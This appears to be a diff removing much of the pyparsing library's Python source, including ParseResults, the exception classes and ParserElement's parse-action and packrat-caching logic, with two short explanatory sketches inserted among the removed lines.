-'commaSeparatedList', 'commonHTMLEntity', 'countedArray', 'cppStyleComment', 'dblQuotedString',
-'dblSlashComment', 'delimitedList', 'dictOf', 'downcaseTokens', 'empty', 'hexnums',
-'htmlComment', 'javaStyleComment', 'keepOriginalText', 'line', 'lineEnd', 'lineStart', 'lineno',
-'makeHTMLTags', 'makeXMLTags', 'matchOnlyAtCol', 'matchPreviousExpr', 'matchPreviousLiteral',
-'nestedExpr', 'nullDebugAction', 'nums', 'oneOf', 'opAssoc', 'operatorPrecedence', 'printables',
-'punc8bit', 'pythonStyleComment', 'quotedString', 'removeQuotes', 'replaceHTMLEntity',
-'replaceWith', 'restOfLine', 'sglQuotedString', 'srange', 'stringEnd',
-'stringStart', 'traceParseAction', 'unicodeString', 'upcaseTokens', 'withAttribute',
-'indentedBlock', 'originalTextFor', 'ungroup', 'infixNotation','locatedExpr',
-]
-
-PY_3 = sys.version.startswith('3')
-if PY_3:
- _MAX_INT = sys.maxsize
- basestring = str
- unichr = chr
- _ustr = str
-
- # build list of single arg builtins, that can be used as parse actions
- singleArgBuiltins = [sum, len, sorted, reversed, list, tuple, set, any, all, min, max]
-
-else:
- _MAX_INT = sys.maxint
- range = xrange
-
- def _ustr(obj):
- """Drop-in replacement for str(obj) that tries to be Unicode friendly. It first tries
- str(obj). If that fails with a UnicodeEncodeError, then it tries unicode(obj). It
- then < returns the unicode object | encodes it with the default encoding | ... >.
- """
- if isinstance(obj,unicode):
- return obj
-
- try:
- # If this works, then _ustr(obj) has the same behaviour as str(obj), so
- # it won't break any existing code.
- return str(obj)
-
- except UnicodeEncodeError:
- # The Python docs (http://docs.python.org/ref/customization.html#l2h-182)
- # state that "The return value must be a string object". However, does a
- # unicode object (being a subclass of basestring) count as a "string
- # object"?
- # If so, then return a unicode object:
- return unicode(obj)
- # Else encode it... but how? There are many choices... :)
- # Replace unprintables with escape codes?
- #return unicode(obj).encode(sys.getdefaultencoding(), 'backslashreplace_errors')
- # Replace unprintables with question marks?
- #return unicode(obj).encode(sys.getdefaultencoding(), 'replace')
- # ...
-
- # build list of single arg builtins, tolerant of Python version, that can be used as parse actions
- singleArgBuiltins = []
- import __builtin__
- for fname in "sum len sorted reversed list tuple set any all min max".split():
- try:
- singleArgBuiltins.append(getattr(__builtin__,fname))
- except AttributeError:
- continue
-
-_generatorType = type((y for y in range(1)))
-
-def _xml_escape(data):
- """Escape &, <, >, ", ', etc. in a string of data."""
-
- # ampersand must be replaced first
- from_symbols = '&><"\''
- to_symbols = ('&'+s+';' for s in "amp gt lt quot apos".split())
- for from_,to_ in zip(from_symbols, to_symbols):
- data = data.replace(from_, to_)
- return data
-
-class _Constants(object):
- pass
-
-alphas = string.ascii_lowercase + string.ascii_uppercase
-nums = "0123456789"
-hexnums = nums + "ABCDEFabcdef"
-alphanums = alphas + nums
-_bslash = chr(92)
-printables = "".join(c for c in string.printable if c not in string.whitespace)
-
-class ParseBaseException(Exception):
- """base exception class for all parsing runtime exceptions"""
- # Performance tuning: we construct a *lot* of these, so keep this
- # constructor as small and fast as possible
- def __init__( self, pstr, loc=0, msg=None, elem=None ):
- self.loc = loc
- if msg is None:
- self.msg = pstr
- self.pstr = ""
- else:
- self.msg = msg
- self.pstr = pstr
- self.parserElement = elem
-
- def __getattr__( self, aname ):
- """supported attributes by name are:
- - lineno - returns the line number of the exception text
- - col - returns the column number of the exception text
- - line - returns the line containing the exception text
- """
- if( aname == "lineno" ):
- return lineno( self.loc, self.pstr )
- elif( aname in ("col", "column") ):
- return col( self.loc, self.pstr )
- elif( aname == "line" ):
- return line( self.loc, self.pstr )
- else:
- raise AttributeError(aname)
-
- def __str__( self ):
- return "%s (at char %d), (line:%d, col:%d)" % \
- ( self.msg, self.loc, self.lineno, self.column )
- def __repr__( self ):
- return _ustr(self)
- def markInputline( self, markerString = ">!<" ):
- """Extracts the exception line from the input string, and marks
- the location of the exception with a special symbol.
- """
- line_str = self.line
- line_column = self.column - 1
- if markerString:
- line_str = "".join((line_str[:line_column],
- markerString, line_str[line_column:]))
- return line_str.strip()
- def __dir__(self):
- return "loc msg pstr parserElement lineno col line " \
- "markInputline __str__ __repr__".split()
-
-class ParseException(ParseBaseException):
- """exception thrown when parse expressions don't match class;
- supported attributes by name are:
- - lineno - returns the line number of the exception text
- - col - returns the column number of the exception text
- - line - returns the line containing the exception text
- """
- pass
-
-class ParseFatalException(ParseBaseException):
- """user-throwable exception thrown when inconsistent parse content
- is found; stops all parsing immediately"""
- pass
-
-class ParseSyntaxException(ParseFatalException):
- """just like C{L{ParseFatalException}}, but thrown internally when an
- C{L{ErrorStop}} ('-' operator) indicates that parsing is to stop immediately because
- an unbacktrackable syntax error has been found"""
- def __init__(self, pe):
- super(ParseSyntaxException, self).__init__(
- pe.pstr, pe.loc, pe.msg, pe.parserElement)
-
-#~ class ReparseException(ParseBaseException):
- #~ """Experimental class - parse actions can raise this exception to cause
- #~ pyparsing to reparse the input string:
- #~ - with a modified input string, and/or
- #~ - with a modified start location
- #~ Set the values of the ReparseException in the constructor, and raise the
- #~ exception in a parse action to cause pyparsing to use the new string/location.
- #~ Setting the values as None causes no change to be made.
- #~ """
- #~ def __init_( self, newstring, restartLoc ):
- #~ self.newParseText = newstring
- #~ self.reparseLoc = restartLoc
-
-class RecursiveGrammarException(Exception):
- """exception thrown by C{validate()} if the grammar could be improperly recursive"""
- def __init__( self, parseElementList ):
- self.parseElementTrace = parseElementList
-
- def __str__( self ):
- return "RecursiveGrammarException: %s" % self.parseElementTrace
-
-class _ParseResultsWithOffset(object):
- def __init__(self,p1,p2):
- self.tup = (p1,p2)
- def __getitem__(self,i):
- return self.tup[i]
- def __repr__(self):
- return repr(self.tup)
- def setOffset(self,i):
- self.tup = (self.tup[0],i)
-
-class ParseResults(object):
- """Structured parse results, to provide multiple means of access to the parsed data:
- - as a list (C{len(results)})
- - by list index (C{results[0], results[1]}, etc.)
- - by attribute (C{results.<resultsName>})
- """
- def __new__(cls, toklist, name=None, asList=True, modal=True ):
- if isinstance(toklist, cls):
- return toklist
- retobj = object.__new__(cls)
- retobj.__doinit = True
- return retobj
-
- # Performance tuning: we construct a *lot* of these, so keep this
- # constructor as small and fast as possible
- def __init__( self, toklist, name=None, asList=True, modal=True, isinstance=isinstance ):
- if self.__doinit:
- self.__doinit = False
- self.__name = None
- self.__parent = None
- self.__accumNames = {}
- if isinstance(toklist, list):
- self.__toklist = toklist[:]
- elif isinstance(toklist, _generatorType):
- self.__toklist = list(toklist)
- else:
- self.__toklist = [toklist]
- self.__tokdict = dict()
-
- if name is not None and name:
- if not modal:
- self.__accumNames[name] = 0
- if isinstance(name,int):
- name = _ustr(name) # will always return a str, but use _ustr for consistency
- self.__name = name
- if not (isinstance(toklist, (type(None), basestring, list)) and toklist in (None,'',[])):
- if isinstance(toklist,basestring):
- toklist = [ toklist ]
- if asList:
- if isinstance(toklist,ParseResults):
- self[name] = _ParseResultsWithOffset(toklist.copy(),0)
- else:
- self[name] = _ParseResultsWithOffset(ParseResults(toklist[0]),0)
- self[name].__name = name
- else:
- try:
- self[name] = toklist[0]
- except (KeyError,TypeError,IndexError):
- self[name] = toklist
-
- def __getitem__( self, i ):
- if isinstance( i, (int,slice) ):
- return self.__toklist[i]
- else:
- if i not in self.__accumNames:
- return self.__tokdict[i][-1][0]
- else:
- return ParseResults([ v[0] for v in self.__tokdict[i] ])
-
- def __setitem__( self, k, v, isinstance=isinstance ):
- if isinstance(v,_ParseResultsWithOffset):
- self.__tokdict[k] = self.__tokdict.get(k,list()) + [v]
- sub = v[0]
- elif isinstance(k,int):
- self.__toklist[k] = v
- sub = v
- else:
- self.__tokdict[k] = self.__tokdict.get(k,list()) + [_ParseResultsWithOffset(v,0)]
- sub = v
- if isinstance(sub,ParseResults):
- sub.__parent = wkref(self)
-
- def __delitem__( self, i ):
- if isinstance(i,(int,slice)):
- mylen = len( self.__toklist )
- del self.__toklist[i]
-
- # convert int to slice
- if isinstance(i, int):
- if i < 0:
- i += mylen
- i = slice(i, i+1)
- # get removed indices
- removed = list(range(*i.indices(mylen)))
- removed.reverse()
- # fixup indices in token dictionary
- for name in self.__tokdict:
- occurrences = self.__tokdict[name]
- for j in removed:
- for k, (value, position) in enumerate(occurrences):
- occurrences[k] = _ParseResultsWithOffset(value, position - (position > j))
- else:
- del self.__tokdict[i]
-
- def __contains__( self, k ):
- return k in self.__tokdict
-
- def __len__( self ): return len( self.__toklist )
- def __bool__(self): return len( self.__toklist ) > 0
- __nonzero__ = __bool__
- def __iter__( self ): return iter( self.__toklist )
- def __reversed__( self ): return iter( self.__toklist[::-1] )
- def iterkeys( self ):
- """Returns all named result keys."""
- if hasattr(self.__tokdict, "iterkeys"):
- return self.__tokdict.iterkeys()
- else:
- return iter(self.__tokdict)
-
- def itervalues( self ):
- """Returns all named result values."""
- return (self[k] for k in self.iterkeys())
-
- def iteritems( self ):
- return ((k, self[k]) for k in self.iterkeys())
-
- if PY_3:
- keys = iterkeys
- values = itervalues
- items = iteritems
- else:
- def keys( self ):
- """Returns all named result keys."""
- return list(self.iterkeys())
-
- def values( self ):
- """Returns all named result values."""
- return list(self.itervalues())
-
- def items( self ):
- """Returns all named result keys and values as a list of tuples."""
- return list(self.iteritems())
-
- def haskeys( self ):
- """Since keys() returns an iterator, this method is helpful in bypassing
- code that looks for the existence of any defined results names."""
- return bool(self.__tokdict)
-
- def pop( self, *args, **kwargs):
- """Removes and returns item at specified index (default=last).
- Supports both list and dict semantics for pop(). If passed no
- argument or an integer argument, it will use list semantics
- and pop tokens from the list of parsed tokens. If passed a
- non-integer argument (most likely a string), it will use dict
- semantics and pop the corresponding value from any defined
- results names. A second default return value argument is
- supported, just as in dict.pop()."""
- if not args:
- args = [-1]
- for k,v in kwargs.items():
- if k == 'default':
- args = (args[0], v)
- else:
- raise TypeError("pop() got an unexpected keyword argument '%s'" % k)
- if (isinstance(args[0], int) or
- len(args) == 1 or
- args[0] in self):
- index = args[0]
- ret = self[index]
- del self[index]
- return ret
- else:
- defaultvalue = args[1]
- return defaultvalue
-
- def get(self, key, defaultValue=None):
- """Returns named result matching the given key, or if there is no
- such name, then returns the given C{defaultValue} or C{None} if no
- C{defaultValue} is specified."""
- if key in self:
- return self[key]
- else:
- return defaultValue
-
- def insert( self, index, insStr ):
- """Inserts new element at location index in the list of parsed tokens."""
- self.__toklist.insert(index, insStr)
- # fixup indices in token dictionary
- for name in self.__tokdict:
- occurrences = self.__tokdict[name]
- for k, (value, position) in enumerate(occurrences):
- occurrences[k] = _ParseResultsWithOffset(value, position + (position > index))
-
- def append( self, item ):
- """Add single element to end of ParseResults list of elements."""
- self.__toklist.append(item)
-
- def extend( self, itemseq ):
- """Add sequence of elements to end of ParseResults list of elements."""
- if isinstance(itemseq, ParseResults):
- self += itemseq
- else:
- self.__toklist.extend(itemseq)
-
- def clear( self ):
- """Clear all elements and results names."""
- del self.__toklist[:]
- self.__tokdict.clear()
-
- def __getattr__( self, name ):
- try:
- return self[name]
- except KeyError:
- return ""
-
- if name in self.__tokdict:
- if name not in self.__accumNames:
- return self.__tokdict[name][-1][0]
- else:
- return ParseResults([ v[0] for v in self.__tokdict[name] ])
- else:
- return ""
-
- def __add__( self, other ):
- ret = self.copy()
- ret += other
- return ret
-
- def __iadd__( self, other ):
- if other.__tokdict:
- offset = len(self.__toklist)
- addoffset = ( lambda a: (a<0 and offset) or (a+offset) )
- otheritems = other.__tokdict.items()
- otherdictitems = [(k, _ParseResultsWithOffset(v[0],addoffset(v[1])) )
- for (k,vlist) in otheritems for v in vlist]
- for k,v in otherdictitems:
- self[k] = v
- if isinstance(v[0],ParseResults):
- v[0].__parent = wkref(self)
-
- self.__toklist += other.__toklist
- self.__accumNames.update( other.__accumNames )
- return self
-
- def __radd__(self, other):
- if isinstance(other,int) and other == 0:
- return self.copy()
-
- def __repr__( self ):
- return "(%s, %s)" % ( repr( self.__toklist ), repr( self.__tokdict ) )
-
- def __str__( self ):
- out = []
- for i in self.__toklist:
- if isinstance(i, ParseResults):
- out.append(_ustr(i))
- else:
- out.append(repr(i))
- return '[' + ', '.join(out) + ']'
-
- def _asStringList( self, sep='' ):
- out = []
- for item in self.__toklist:
- if out and sep:
- out.append(sep)
- if isinstance( item, ParseResults ):
- out += item._asStringList()
- else:
- out.append( _ustr(item) )
- return out
-
- def asList( self ):
- """Returns the parse results as a nested list of matching tokens, all converted to strings."""
- out = []
- for res in self.__toklist:
- if isinstance(res,ParseResults):
- out.append( res.asList() )
- else:
- out.append( res )
- return out
-
- def asDict( self ):
- """Returns the named parse results as dictionary."""
- if PY_3:
- return dict( self.items() )
- else:
- return dict( self.iteritems() )
-
- def copy( self ):
- """Returns a new copy of a C{ParseResults} object."""
- ret = ParseResults( self.__toklist )
- ret.__tokdict = self.__tokdict.copy()
- ret.__parent = self.__parent
- ret.__accumNames.update( self.__accumNames )
- ret.__name = self.__name
- return ret
-
- def asXML( self, doctag=None, namedItemsOnly=False, indent="", formatted=True ):
- """Returns the parse results as XML. Tags are created for tokens and lists that have defined results names."""
- nl = "\n"
- out = []
- namedItems = dict((v[1],k) for (k,vlist) in self.__tokdict.items()
- for v in vlist)
- nextLevelIndent = indent + " "
-
- # collapse out indents if formatting is not desired
- if not formatted:
- indent = ""
- nextLevelIndent = ""
- nl = ""
-
- selfTag = None
- if doctag is not None:
- selfTag = doctag
- else:
- if self.__name:
- selfTag = self.__name
-
- if not selfTag:
- if namedItemsOnly:
- return ""
- else:
- selfTag = "ITEM"
-
- out += [ nl, indent, "<", selfTag, ">" ]
-
- worklist = self.__toklist
- for i,res in enumerate(worklist):
- if isinstance(res,ParseResults):
- if i in namedItems:
- out += [ res.asXML(namedItems[i],
- namedItemsOnly and doctag is None,
- nextLevelIndent,
- formatted)]
- else:
- out += [ res.asXML(None,
- namedItemsOnly and doctag is None,
- nextLevelIndent,
- formatted)]
- else:
- # individual token, see if there is a name for it
- resTag = None
- if i in namedItems:
- resTag = namedItems[i]
- if not resTag:
- if namedItemsOnly:
- continue
- else:
- resTag = "ITEM"
- xmlBodyText = _xml_escape(_ustr(res))
- out += [ nl, nextLevelIndent, "<", resTag, ">",
- xmlBodyText,
- "</", resTag, ">" ]
-
- out += [ nl, indent, "</", selfTag, ">" ]
- return "".join(out)
-
- def __lookup(self,sub):
- for k,vlist in self.__tokdict.items():
- for v,loc in vlist:
- if sub is v:
- return k
- return None
-
- def getName(self):
- """Returns the results name for this token expression."""
- if self.__name:
- return self.__name
- elif self.__parent:
- par = self.__parent()
- if par:
- return par.__lookup(self)
- else:
- return None
- elif (len(self) == 1 and
- len(self.__tokdict) == 1 and
- self.__tokdict.values()[0][0][1] in (0,-1)):
- return self.__tokdict.keys()[0]
- else:
- return None
-
- def dump(self,indent='',depth=0):
- """Diagnostic method for listing out the contents of a C{ParseResults}.
- Accepts an optional C{indent} argument so that this string can be embedded
- in a nested display of other data."""
- out = []
- NL = '\n'
- out.append( indent+_ustr(self.asList()) )
- items = sorted(self.items())
- for k,v in items:
- if out:
- out.append(NL)
- out.append( "%s%s- %s: " % (indent,(' '*depth), k) )
- if isinstance(v,ParseResults):
- if v:
- if v.haskeys():
- out.append( v.dump(indent,depth+1) )
- elif any(isinstance(vv,ParseResults) for vv in v):
- for i,vv in enumerate(v):
- if isinstance(vv,ParseResults):
- out.append("\n%s%s[%d]:\n%s%s%s" % (indent,(' '*(depth+1)),i,indent,(' '*(depth+2)),vv.dump(indent,depth+2) ))
- else:
- out.append("\n%s%s[%d]:\n%s%s%s" % (indent,(' '*(depth+1)),i,indent,(' '*(depth+2)),_ustr(vv)))
- else:
- out.append(_ustr(v))
- else:
- out.append(_ustr(v))
- else:
- out.append(_ustr(v))
- return "".join(out)
-
- def pprint(self, *args, **kwargs):
- """Pretty-printer for parsed results as a list, using the C{pprint} module.
- Accepts additional positional or keyword args as defined for the
- C{pprint.pprint} method. (U{http://docs.python.org/3/library/pprint.html#pprint.pprint})"""
- pprint.pprint(self.asList(), *args, **kwargs)
-
- # add support for pickle protocol
- def __getstate__(self):
- return ( self.__toklist,
- ( self.__tokdict.copy(),
- self.__parent is not None and self.__parent() or None,
- self.__accumNames,
- self.__name ) )
-
- def __setstate__(self,state):
- self.__toklist = state[0]
- (self.__tokdict,
- par,
- inAccumNames,
- self.__name) = state[1]
- self.__accumNames = {}
- self.__accumNames.update(inAccumNames)
- if par is not None:
- self.__parent = wkref(par)
- else:
- self.__parent = None
-
- def __dir__(self):
- return dir(super(ParseResults,self)) + list(self.keys())
-
-collections.MutableMapping.register(ParseResults)
-
-def col (loc,strg):
- """Returns current column within a string, counting newlines as line separators.
- The first column is number 1.
-
- Note: the default parsing behavior is to expand tabs in the input string
- before starting the parsing process. See L{I{ParserElement.parseString}<ParserElement.parseString>} for more information
- on parsing strings containing C{<TAB>}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- return (loc<len(strg) and strg[loc] == '\n') and 1 or loc - strg.rfind("\n", 0, loc)
-
-def lineno(loc,strg):
- """Returns current line number within a string, counting newlines as line separators.
- The first line is number 1.
-
- Note: the default parsing behavior is to expand tabs in the input string
- before starting the parsing process. See L{I{ParserElement.parseString}<ParserElement.parseString>} for more information
- on parsing strings containing C{<TAB>}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- return strg.count("\n",0,loc) + 1
-
-def line( loc, strg ):
- """Returns the line of text containing loc within a string, counting newlines as line separators.
- """
- lastCR = strg.rfind("\n", 0, loc)
- nextCR = strg.find("\n", loc)
- if nextCR >= 0:
- return strg[lastCR+1:nextCR]
- else:
- return strg[lastCR+1:]
-
-def _defaultStartDebugAction( instring, loc, expr ):
- print (("Match " + _ustr(expr) + " at loc " + _ustr(loc) + "(%d,%d)" % ( lineno(loc,instring), col(loc,instring) )))
-
-def _defaultSuccessDebugAction( instring, startloc, endloc, expr, toks ):
- print ("Matched " + _ustr(expr) + " -> " + str(toks.asList()))
-
-def _defaultExceptionDebugAction( instring, loc, expr, exc ):
- print ("Exception raised:" + _ustr(exc))
-
-def nullDebugAction(*args):
- """'Do-nothing' debug action, to suppress debugging output during parsing."""
- pass
-
-# Only works on Python 3.x - nonlocal is toxic to Python 2 installs
-#~ 'decorator to trim function calls to match the arity of the target'
-#~ def _trim_arity(func, maxargs=3):
- #~ if func in singleArgBuiltins:
- #~ return lambda s,l,t: func(t)
- #~ limit = 0
- #~ foundArity = False
- #~ def wrapper(*args):
- #~ nonlocal limit,foundArity
- #~ while 1:
- #~ try:
- #~ ret = func(*args[limit:])
- #~ foundArity = True
- #~ return ret
- #~ except TypeError:
- #~ if limit == maxargs or foundArity:
- #~ raise
- #~ limit += 1
- #~ continue
- #~ return wrapper
-
-# this version is Python 2.x-3.x cross-compatible
-'decorator to trim function calls to match the arity of the target'
-def _trim_arity(func, maxargs=2):
- if func in singleArgBuiltins:
- return lambda s,l,t: func(t)
- limit = [0]
- foundArity = [False]
- def wrapper(*args):
- while 1:
- try:
- ret = func(*args[limit[0]:])
- foundArity[0] = True
- return ret
- except TypeError:
- if limit[0] <= maxargs and not foundArity[0]:
- limit[0] += 1
- continue
- raise
- return wrapper
-
-class ParserElement(object):
- """Abstract base level parser element class."""
- DEFAULT_WHITE_CHARS = " \n\t\r"
- verbose_stacktrace = False
-
- def setDefaultWhitespaceChars( chars ):
- """Overrides the default whitespace chars
- """
- ParserElement.DEFAULT_WHITE_CHARS = chars
- setDefaultWhitespaceChars = staticmethod(setDefaultWhitespaceChars)
-
- def inlineLiteralsUsing(cls):
- """
- Set class to be used for inclusion of string literals into a parser.
- """
- ParserElement.literalStringClass = cls
- inlineLiteralsUsing = staticmethod(inlineLiteralsUsing)
-
- def __init__( self, savelist=False ):
- self.parseAction = list()
- self.failAction = None
- #~ self.name = "" # don't define self.name, let subclasses try/except upcall
- self.strRepr = None
- self.resultsName = None
- self.saveAsList = savelist
- self.skipWhitespace = True
- self.whiteChars = ParserElement.DEFAULT_WHITE_CHARS
- self.copyDefaultWhiteChars = True
- self.mayReturnEmpty = False # used when checking for left-recursion
- self.keepTabs = False
- self.ignoreExprs = list()
- self.debug = False
- self.streamlined = False
- self.mayIndexError = True # used to optimize exception handling for subclasses that don't advance parse index
- self.errmsg = ""
- self.modalResults = True # used to mark results names as modal (report only last) or cumulative (list all)
- self.debugActions = ( None, None, None ) #custom debug actions
- self.re = None
- self.callPreparse = True # used to avoid redundant calls to preParse
- self.callDuringTry = False
-
- def copy( self ):
- """Make a copy of this C{ParserElement}. Useful for defining different parse actions
- for the same parsing pattern, using copies of the original parse element."""
- cpy = copy.copy( self )
- cpy.parseAction = self.parseAction[:]
- cpy.ignoreExprs = self.ignoreExprs[:]
- if self.copyDefaultWhiteChars:
- cpy.whiteChars = ParserElement.DEFAULT_WHITE_CHARS
- return cpy
-
- def setName( self, name ):
- """Define name for this expression, for use in debugging."""
- self.name = name
- self.errmsg = "Expected " + self.name
- if hasattr(self,"exception"):
- self.exception.msg = self.errmsg
- return self
-
- def setResultsName( self, name, listAllMatches=False ):
- """Define name for referencing matching tokens as a nested attribute
- of the returned parse results.
- NOTE: this returns a *copy* of the original C{ParserElement} object;
- this is so that the client can define a basic element, such as an
- integer, and reference it in multiple places with different names.
-
- You can also set results names using the abbreviated syntax,
- C{expr("name")} in place of C{expr.setResultsName("name")} -
- see L{I{__call__}<__call__>}.
- """
- newself = self.copy()
- if name.endswith("*"):
- name = name[:-1]
- listAllMatches=True
- newself.resultsName = name
- newself.modalResults = not listAllMatches
- return newself
-
- def setBreak(self,breakFlag = True):
- """Method to invoke the Python pdb debugger when this element is
- about to be parsed. Set C{breakFlag} to True to enable, False to
- disable.
- """
- if breakFlag:
- _parseMethod = self._parse
- def breaker(instring, loc, doActions=True, callPreParse=True):
- import pdb
- pdb.set_trace()
- return _parseMethod( instring, loc, doActions, callPreParse )
- breaker._originalParseMethod = _parseMethod
- self._parse = breaker
- else:
- if hasattr(self._parse,"_originalParseMethod"):
- self._parse = self._parse._originalParseMethod
- return self
-
- def setParseAction( self, *fns, **kwargs ):
- """Define action to perform when successfully matching parse element definition.
- Parse action fn is a callable method with 0-3 arguments, called as C{fn(s,loc,toks)},
- C{fn(loc,toks)}, C{fn(toks)}, or just C{fn()}, where:
- - s = the original string being parsed (see note below)
- - loc = the location of the matching substring
- - toks = a list of the matched tokens, packaged as a C{L{ParseResults}} object
- If the functions in fns modify the tokens, they can return them as the return
- value from fn, and the modified list of tokens will replace the original.
- Otherwise, fn does not need to return any value.
-
- Note: the default parsing behavior is to expand tabs in the input string
- before starting the parsing process. See L{I{parseString}} for more information
- on parsing strings containing C{<TAB>}s, and suggested methods to maintain a
- consistent view of the parsed string, the parse location, and line and column
- positions within the parsed string.
- """
- self.parseAction = list(map(_trim_arity, list(fns)))
- self.callDuringTry = ("callDuringTry" in kwargs and kwargs["callDuringTry"])
- return self
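The 0-to-3-argument flexibility described in the docstring above can be sketched with a small stdlib-only adapter. This is only an illustration of what `_trim_arity` achieves (the real implementation uses trial-and-error on `TypeError` and handles bound methods and caching); `trim_arity` here is a hypothetical name.

```python
import inspect

# Sketch: accept a parse action taking 0-3 arguments and normalize it
# to the full (s, loc, toks) calling convention by passing only the
# trailing arguments the function declares.
def trim_arity(fn):
    n = len(inspect.signature(fn).parameters)
    if n > 3:
        raise TypeError("parse actions take at most 3 arguments")
    def wrapper(s, loc, toks):
        # (s, loc, toks)[3-n:] keeps the last n arguments
        return fn(*(s, loc, toks)[3 - n:])
    return wrapper

upcase = trim_arity(lambda toks: [t.upper() for t in toks])
assert upcase("input", 0, ["abc", "de"]) == ["ABC", "DE"]

with_loc = trim_arity(lambda loc, toks: (loc, list(toks)))
assert with_loc("input", 7, ["x"]) == (7, ["x"])
```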
-
- def addParseAction( self, *fns, **kwargs ):
- """Add parse action to expression's list of parse actions. See L{I{setParseAction}}."""
- self.parseAction += list(map(_trim_arity, list(fns)))
- self.callDuringTry = self.callDuringTry or ("callDuringTry" in kwargs and kwargs["callDuringTry"])
- return self
-
- def setFailAction( self, fn ):
- """Define action to perform if parsing fails at this expression.
- Fail action fn is a callable function that takes the arguments
- C{fn(s,loc,expr,err)} where:
- - s = string being parsed
- - loc = location where expression match was attempted and failed
- - expr = the parse expression that failed
- - err = the exception thrown
- The function returns no value. It may throw C{L{ParseFatalException}}
- if it is desired to stop parsing immediately."""
- self.failAction = fn
- return self
-
- def _skipIgnorables( self, instring, loc ):
- exprsFound = True
- while exprsFound:
- exprsFound = False
- for e in self.ignoreExprs:
- try:
- while 1:
- loc,dummy = e._parse( instring, loc )
- exprsFound = True
- except ParseException:
- pass
- return loc
-
- def preParse( self, instring, loc ):
- if self.ignoreExprs:
- loc = self._skipIgnorables( instring, loc )
-
- if self.skipWhitespace:
- wt = self.whiteChars
- instrlen = len(instring)
- while loc < instrlen and instring[loc] in wt:
- loc += 1
-
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- return loc, []
-
- def postParse( self, instring, loc, tokenlist ):
- return tokenlist
-
- #~ @profile
- def _parseNoCache( self, instring, loc, doActions=True, callPreParse=True ):
- debugging = ( self.debug ) #and doActions )
-
- if debugging or self.failAction:
- #~ print ("Match",self,"at loc",loc,"(%d,%d)" % ( lineno(loc,instring), col(loc,instring) ))
- if (self.debugActions[0] ):
- self.debugActions[0]( instring, loc, self )
- if callPreParse and self.callPreparse:
- preloc = self.preParse( instring, loc )
- else:
- preloc = loc
- tokensStart = preloc
- try:
- try:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
- except IndexError:
- raise ParseException( instring, len(instring), self.errmsg, self )
- except ParseBaseException as err:
- #~ print ("Exception raised:", err)
- if self.debugActions[2]:
- self.debugActions[2]( instring, tokensStart, self, err )
- if self.failAction:
- self.failAction( instring, tokensStart, self, err )
- raise
- else:
- if callPreParse and self.callPreparse:
- preloc = self.preParse( instring, loc )
- else:
- preloc = loc
- tokensStart = preloc
- if self.mayIndexError or loc >= len(instring):
- try:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
- except IndexError:
- raise ParseException( instring, len(instring), self.errmsg, self )
- else:
- loc,tokens = self.parseImpl( instring, preloc, doActions )
-
- tokens = self.postParse( instring, loc, tokens )
-
- retTokens = ParseResults( tokens, self.resultsName, asList=self.saveAsList, modal=self.modalResults )
- if self.parseAction and (doActions or self.callDuringTry):
- if debugging:
- try:
- for fn in self.parseAction:
- tokens = fn( instring, tokensStart, retTokens )
- if tokens is not None:
- retTokens = ParseResults( tokens,
- self.resultsName,
- asList=self.saveAsList and isinstance(tokens,(ParseResults,list)),
- modal=self.modalResults )
- except ParseBaseException as err:
- #~ print "Exception raised in user parse action:", err
- if (self.debugActions[2] ):
- self.debugActions[2]( instring, tokensStart, self, err )
- raise
- else:
- for fn in self.parseAction:
- tokens = fn( instring, tokensStart, retTokens )
- if tokens is not None:
- retTokens = ParseResults( tokens,
- self.resultsName,
- asList=self.saveAsList and isinstance(tokens,(ParseResults,list)),
- modal=self.modalResults )
-
- if debugging:
- #~ print ("Matched",self,"->",retTokens.asList())
- if (self.debugActions[1] ):
- self.debugActions[1]( instring, tokensStart, loc, self, retTokens )
-
- return loc, retTokens
-
- def tryParse( self, instring, loc ):
- try:
- return self._parse( instring, loc, doActions=False )[0]
- except ParseFatalException:
- raise ParseException( instring, loc, self.errmsg, self)
-
- # this method gets repeatedly called during backtracking with the same arguments -
- # we can cache these arguments and save ourselves the trouble of re-parsing the contained expression
- def _parseCache( self, instring, loc, doActions=True, callPreParse=True ):
- lookup = (self,instring,loc,callPreParse,doActions)
- if lookup in ParserElement._exprArgCache:
- value = ParserElement._exprArgCache[ lookup ]
- if isinstance(value, Exception):
- raise value
- return (value[0],value[1].copy())
- else:
- try:
- value = self._parseNoCache( instring, loc, doActions, callPreParse )
- ParserElement._exprArgCache[ lookup ] = (value[0],value[1].copy())
- return value
- except ParseBaseException as pe:
- pe.__traceback__ = None
- ParserElement._exprArgCache[ lookup ] = pe
- raise
-
- _parse = _parseNoCache
-
- # argument cache for optimizing repeated calls when backtracking through recursive expressions
- _exprArgCache = {}
- def resetCache():
- ParserElement._exprArgCache.clear()
- resetCache = staticmethod(resetCache)
-
- _packratEnabled = False
- def enablePackrat():
- """Enables "packrat" parsing, which adds memoizing to the parsing logic.
- Repeated parse attempts at the same string location (which happens
- often in many complex grammars) can immediately return a cached value,
- instead of re-executing parsing/validating code. Both valid results
- and parsing exceptions are memoized.
-
- This speedup may break existing programs that use parse actions that
- have side-effects. For this reason, packrat parsing is disabled when
- you first import pyparsing. To activate the packrat feature, your
- program must call the class method C{ParserElement.enablePackrat()}. If
- your program uses C{psyco} to "compile as you go", you must call
- C{enablePackrat} before calling C{psyco.full()}. If you do not do this,
- Python will crash. For best results, call C{enablePackrat()} immediately
- after importing pyparsing.
- """
- if not ParserElement._packratEnabled:
- ParserElement._packratEnabled = True
- ParserElement._parse = ParserElement._parseCache
- enablePackrat = staticmethod(enablePackrat)
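The packrat idea above can be illustrated with a minimal, self-contained memoizer: results are cached per (expression, position) pair, and failures are cached and replayed just like successes, mirroring what `_parseCache` does. All names below are illustrative, not pyparsing's API.

```python
# Minimal sketch of packrat memoization: cache parse outcomes (including
# failures) keyed by (parser key, input position).
class ParseError(Exception):
    pass

_cache = {}

def memoized(parse_fn):
    def wrapper(key, text, loc):
        lookup = (key, loc)
        if lookup in _cache:
            value = _cache[lookup]
            if isinstance(value, Exception):
                raise value          # replay a cached failure
            return value             # replay a cached success
        try:
            value = parse_fn(key, text, loc)
            _cache[lookup] = value
            return value
        except ParseError as err:
            _cache[lookup] = err
            raise
    return wrapper

calls = []

@memoized
def match_literal(lit, text, loc):
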